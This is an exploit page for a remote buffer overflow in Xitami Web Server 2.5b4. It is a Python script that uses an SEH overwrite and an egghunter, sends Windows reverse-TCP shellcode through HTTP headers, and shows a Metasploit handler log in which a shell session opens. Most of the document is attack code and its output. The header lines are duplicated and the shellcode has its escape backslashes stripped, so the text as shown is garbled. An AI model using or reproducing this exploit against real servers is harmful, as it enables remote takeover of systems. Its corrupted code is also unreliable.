Xitami Web Server 2.5 Remote Buffer Overflow

Details
Category: Vulnerabilities
Hits: 422
# Exploit Title: Xitami Web Server 2.5 Remote Buffer Overflow (SEH + Egghunter)
# Date: May 4, 2019
# Author: ElSoufiane
# Version: 2.5b4
# Tested on: Windows Vista Ultimate (Build # Exploit Title: Xitami Web Server 2.5 Remote Buffer Overflow (SEH + Egghunter)
# Date: May 4, 2019
# Author: ElSoufiane
# Version: 2.5b4
# Tested on: Windows Vista Ultimate (Build 6000) and Windows XP SP3 Professional
# Discovered by: Krystian Kloskowski
#
# Set up a multi handler listener in MSFConsole
# then run exploit
#
# root@f6c9fa91b403:~/XitamiWebServer# python exploit.py 192.168.1.149
# [+] Sending exploit payload...
#
# Check the MSFConsole listener
#
# msf5 exploit(multi/handler) > run
# [*] Started reverse TCP handler on 0.0.0.0:5801
# [*] Encoded stage with x86/shikata_ga_nai
# [*] Sending encoded stage (267 bytes) to 172.17.0.1
# [*] Command shell session 6 opened (172.17.0.2:5801 -> 172.17.0.1:39416) at 2019-05-04 00:17:55 +0000



# C:Xitami>

import socket
import sys
import struct

if len(sys.argv) != 2 :
print "[+] Usage : python exploit.py [VICTIM_IP]"
exit(0)

TCP_IP = sys.argv[1]
TCP_PORT = 80


egg = "SOUFSOUF"
nops = "x90"*10

#msfvenom -p windows/shell/reverse_tcp LPORT=5801 LHOST=192.168.1.129 -f python -v shellcode -e x86/alpha_mixed
shellcode = "x89xe0xd9xe5xd9x70xf4x5bx53x59x49x49"
shellcode += "x49x49x49x49x49x49x49x49x43x43x43x43"
shellcode += "x43x43x37x51x5ax6ax41x58x50x30x41x30"
shellcode += "x41x6bx41x41x51x32x41x42x32x42x42x30"
shellcode += "x42x42x41x42x58x50x38x41x42x75x4ax49"
shellcode += "x69x6cx68x68x6cx42x63x30x37x70x63x30"
shellcode += "x51x70x6bx39x6dx35x70x31x6fx30x70x64"
shellcode += "x4ex6bx76x30x70x30x4ex6bx76x32x54x4c"
shellcode += "x6ex6bx72x72x46x74x6cx4bx53x42x55x78"
shellcode += "x34x4fx4ex57x42x6ax35x76x30x31x59x6f"
shellcode += "x4ex4cx77x4cx70x61x31x6cx75x52x34x6c"
shellcode += "x35x70x6bx71x38x4fx56x6dx47x71x4ax67"
shellcode += "x4ax42x49x62x63x62x63x67x6ex6bx63x62"
shellcode += "x52x30x4cx4bx53x7ax77x4cx6ex6bx70x4c"
shellcode += "x72x31x31x68x59x73x30x48x53x31x68x51"
shellcode += "x72x71x4ex6bx30x59x57x50x55x51x6ex33"
shellcode += "x4cx4bx73x79x72x38x48x63x56x5ax62x69"
shellcode += "x4cx4bx66x54x6cx4bx73x31x49x46x64x71"
shellcode += "x4bx4fx6cx6cx5ax61x68x4fx66x6dx77x71"
shellcode += "x69x57x30x38x4bx50x74x35x58x76x55x53"
shellcode += "x71x6dx6bx48x55x6bx73x4dx44x64x32x55"
shellcode += "x4ax44x43x68x4cx4bx70x58x31x34x65x51"
shellcode += "x4ax73x62x46x4ex6bx54x4cx52x6bx6ex6b"
shellcode += "x33x68x37x6cx43x31x4bx63x6ex6bx34x44"
shellcode += "x6cx4bx43x31x4ax70x4cx49x37x34x37x54"
shellcode += "x44x64x51x4bx73x6bx53x51x52x79x52x7a"
shellcode += "x42x71x6bx4fx69x70x71x4fx43x6fx32x7a"
shellcode += "x4cx4bx37x62x7ax4bx4ex6dx71x4dx55x38"
shellcode += "x56x53x70x32x77x70x65x50x62x48x44x37"
shellcode += "x42x53x74x72x63x6fx43x64x33x58x42x6c"
shellcode += "x63x47x31x36x54x47x6dx59x6bx58x69x6f"
shellcode += "x4ex30x4ex58x4cx50x67x71x47x70x67x70"
shellcode += "x37x59x4ax64x31x44x56x30x70x68x55x79"
shellcode += "x4fx70x30x6bx63x30x6bx4fx68x55x61x7a"
shellcode += "x35x5ax72x48x39x50x79x38x45x51x4fx71"
shellcode += "x52x48x46x62x43x30x32x36x39x39x6cx49"
shellcode += "x59x76x36x30x46x30x36x30x32x70x51x50"
shellcode += "x36x30x67x30x76x30x32x48x6ax4ax56x6f"
shellcode += "x79x4fx39x70x59x6fx79x45x5ax37x70x6a"
shellcode += "x46x70x71x46x63x67x30x68x6ex79x69x35"
shellcode += "x44x34x30x61x59x6fx59x45x6dx55x49x50"
shellcode += "x53x44x55x5ax79x6fx30x4ex66x68x53x45"
shellcode += "x6ax4cx6ax48x52x47x73x30x33x30x73x30"
shellcode += "x61x7ax55x50x33x5ax67x74x71x46x66x37"
shellcode += "x62x48x45x52x68x59x4fx38x51x4fx59x6f"
shellcode += "x6bx65x4fx73x7ax58x53x30x63x4ex57x46"
shellcode += "x4cx4bx35x66x32x4ax63x70x72x48x63x30"
shellcode += "x76x70x65x50x77x70x73x66x62x4ax37x70"
shellcode += "x32x48x46x38x4ex44x76x33x79x75x79x6f"
shellcode += "x5ax75x6ex73x76x33x52x4ax73x30x76x36"
shellcode += "x42x73x32x77x33x58x45x52x78x59x78x48"
shellcode += "x61x4fx39x6fx59x45x4dx53x49x68x45x50"
shellcode += "x73x4dx61x38x71x48x62x48x55x50x53x70"
shellcode += "x35x50x53x30x33x5ax45x50x76x30x33x58"
shellcode += "x56x6bx34x6fx46x6fx34x70x4bx4fx78x55"
shellcode += "x71x47x75x38x31x65x70x6ex52x6dx50x61"
shellcode += "x4bx4fx79x45x33x6ex31x4ex4bx4fx44x4c"
shellcode += "x76x44x56x6fx4ex65x72x50x79x6fx69x6f"
shellcode += "x6bx4fx68x69x4dx4bx79x6fx79x6fx49x6f"
shellcode += "x56x61x5ax63x71x39x69x56x51x65x69x51"
shellcode += "x4fx33x6dx6bx5ax50x68x35x4ex42x50x56"
shellcode += "x52x4ax57x70x36x33x69x6fx5ax75x41x41"

egghunter ="x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8"+"SOUF"+"x89xd7xafx75xeaxafx75xe7xffxe7"

nseh_jmp = "xebxaa" #jmp back 84 bytes
seh = "x87x1dx40" # (xiwin32.exe) 0x00401d87 -> pop/pop/ret. ( Parial Overwrite )

payload = "A"*120
payload += egghunter
payload += "A"*(190-len(payload))
payload += nseh_jmp
payload += seh

http_req = "GET / HTTP/1.1 "
http_req += "Host: "+ TCP_IP +" "
http_req += "User-Agent: "+egg+nops+shellcode+" "
http_req += "If-Modified-Since: Wed, " + payload + " "

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
print "[+] Sending exploit payload..."
s.send(http_req)
s.close()